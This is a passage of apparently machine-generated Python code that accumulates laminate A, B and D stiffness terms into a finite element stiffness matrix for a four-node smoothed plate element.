k0[i1*dof+4, i1*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+4, i2*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+4, i2*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+4, i2*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+4, i2*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+4, i3*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+4, i3*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+4, i3*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+4, i3*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+4, i4*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+4, i4*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+4, i4*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+4, i4*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+0, i1*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+0, i1*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+0, i1*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+0, i1*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+0, i2*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+0, i2*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+0, i2*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+0, i2*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+0, i3*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+0, i3*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+0, i3*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+0, i3*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+0, i4*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+0, i4*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+0, i4*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+0, i4*dof+4] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+1, i1*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+1, i1*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+1, i1*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+1, i1*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+1, i2*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+1, i2*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+1, i2*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+1, i2*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+1, i3*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+1, i3*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+1, i3*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+1, i3*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+1, i4*dof+0] += Ac*((A12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+1, i4*dof+1] += Ac*((A22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + A66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+1, i4*dof+3] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
